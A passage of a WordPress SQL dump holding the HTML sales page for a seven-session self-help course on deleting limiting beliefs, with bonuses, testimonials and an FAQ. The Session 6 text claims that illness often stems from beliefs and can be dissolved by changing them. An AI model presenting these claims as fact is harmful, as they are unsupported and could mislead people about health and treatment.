90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today’s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a></p>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-14 21:46:39', '2014-12-15 02:46:39', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
